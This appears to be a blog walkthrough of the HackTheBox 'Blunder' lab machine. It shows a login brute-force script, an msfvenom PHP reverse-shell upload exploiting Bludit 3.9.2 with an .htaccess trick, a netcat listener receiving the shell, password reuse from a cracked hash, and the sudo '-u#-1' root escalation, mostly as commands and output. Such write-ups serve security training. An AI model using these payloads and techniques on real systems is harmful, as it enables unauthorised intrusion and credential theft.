---
title: "Hackthebox - Blunder"
date: 2020-08-24T12:23:34+02:00
draft: true
toc: true
images:
tags:
- hackthebox
- walkthrough
- pentest
- easy
---

## Introduction

{{< image src="../../posts-img/hackthebox-blunder/blunder.png" alt="Blunder" position="center" style="border-radius: 2px;" >}}

As you can see, this machine is on Linux with easy difficulty.


## Recon

Let's start with an **nmap** scan.

```bash
$ nmap -A -T4 -p- -oN scan.nmap 10.10.10.191
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
```

As you can see, only port 80 is open. Let's check it through Firefox.

{{< image src="../../posts-img/hackthebox-blunder/webindex.png" alt="Web page" position="center" style="border-radius: 2px;" >}}

It's a blog page using [Bludit CMS](https://github.com/bludit/bludit).

Thanks to **gobuster** we find an interesting file named **todo.txt** and a login page at **/admin/**.

#### todo.txt
```
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
```

We get the user **fergus**. The login page doesn't seem to be vulnerable, so I decided to bruteforce it.
Let's make a python script.

```python
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup

URL = "http://10.10.10.191/admin/login"
WORDLIST_PATH = "words.txt"

sess = requests.Session()

def find_token():
    csrf_req_src = sess.get(URL).text
    soup = BeautifulSoup(csrf_req_src, "html.parser")
    return soup.find_all("input")[0].get("value")

def brute_force():
    with open(WORDLIST_PATH, "r") as wordlist:
        for word in wordlist:
            csrf = find_token()
            password = word.strip()

            data = {
                "tokenCSRF": csrf,
                "username": "fergus",
                "password": password,
                "save": ""
            }

            print(f"Trying {password} ...")
            req = sess.post(URL, data)
            size = len(req.content)

            if size != 2468:
                print(f"Size: {size}")
                print(f"Password found : {password}")
                break

brute_force()
```

I know that the size of the content of the requests is 2468 when the password is incorrect. So, let's find when the size isn't 2468.

{{< image src="../../posts-img/hackthebox-blunder/brute.png" alt="Bruteforce" position="center" style="border-radius: 2px;" >}}

Oups, my IP address has been blocked !

After comparing articles to the official Wikipedia content, I detect an error on the first article.

{{< image src="../../posts-img/hackthebox-blunder/password.png" alt="Web password" position="center" style="border-radius: 2px;" >}}

> RolandDeschain != Roland Deschain

Let's try to login with **fergus:RolandDeschain**, and here we go ! Now we have a nice little dashboard.

{{< image src="../../posts-img/hackthebox-blunder/dashboard.png" alt="Web dashboard" position="center" style="border-radius: 2px;" >}}

Unfortunately, we can only upload html code, not very interesting. So, I search for Bludit CMS exploit. Thanks to the source code we can get the version of the CMS.

{{< image src="../../posts-img/hackthebox-blunder/bludit_version.png" alt="Bludit Version" position="center" style="border-radius: 2px;" >}}

> Version: 3.9.2

{{< image src="../../posts-img/hackthebox-blunder/searchsploit.png" alt="Searchsploit" position="center" style="border-radius: 2px;" >}}

Let's try it !

```bash
# Creating the php payload
$ msfvenom -p php/reverse_php LHOST=10.10.14.84 LPORT=1337 -f raw -b '"' > evil.png
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4058 (iteration=0)
php/base64 chosen with final size 4058
Payload size: 4058 bytes
# Adding "<?php " at the beginning of the file
$ echo -e "<?php $(cat evil.png)" > evil.png

# Create a .htaccess to treat png files as php pages
$ echo "RewriteEngine off" > .htaccess
$ echo "AddType application/x-httpd-php .png" >> .htaccess

# Upload the 2 files
$ python3 48701.txt
cookie: b6d1n7t8an9vo4k4ji18hirch1
csrf_token: 07c3e0bf18a9fcd4247af8029129053044b5efef
Uploading payload: evil.png
Uploading payload: .htaccess

# Go to http://10.10.10.191/bl-content/tmp/temp/evil.png

# Setup the listener
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.84] from (UNKNOWN) [10.10.10.191] 40938
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

And yes ! We have a reverse shell !

## User Hugo

After looking around the box, we can see another version (newer) of bludit in the /var/www directory.
Let's check the **databases** folder to find some credentials.

```bash
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat security.php
{
    "admin": {
  "nickname": "Hugo",
  "firstName": "Hugo",
  "role": "User",
  "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",}
}
```

> SHA1(Password120) = faca404fd5c0a31cf1897b823c695c85cffeb98d

This password is used by the user hugo.

```bash
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
Password: Password120
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cd
hugo@blunder:~$ cat user.txt
c10ca5b2928fd2b565ec5df534263e93
```

## User Shaun

It was very easy to get the user **shaun** because we can execute /bin/bash as every users except root.

```bash
hugo@blunder:~$ sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:~$ ls /home
hugo  shaun
hugo@blunder:~$ sudo -u shaun /bin/bash
shaun@blunder:/home/hugo$
```

However the user shaun was a rabbit hole, so I come back to hugo.

## Root flag

To get root I use a [sudo exploit](https://www.exploit-db.com/exploits/47502) that allows me to execute /bin/bash as root by using a non-existent user ID which returns 0 and the user ID 0 is root :)

```bash
hugo@blunder:/tmp$ sudo -l
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

hugo@blunder:/tmp$ sudo -u#-1 /bin/bash
root@blunder:/tmp# id  
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/tmp# cat /root/root.txt
b879ada476688b26850d618afcaf5fc3
```


Thanks for reading, hope you enjoyed !
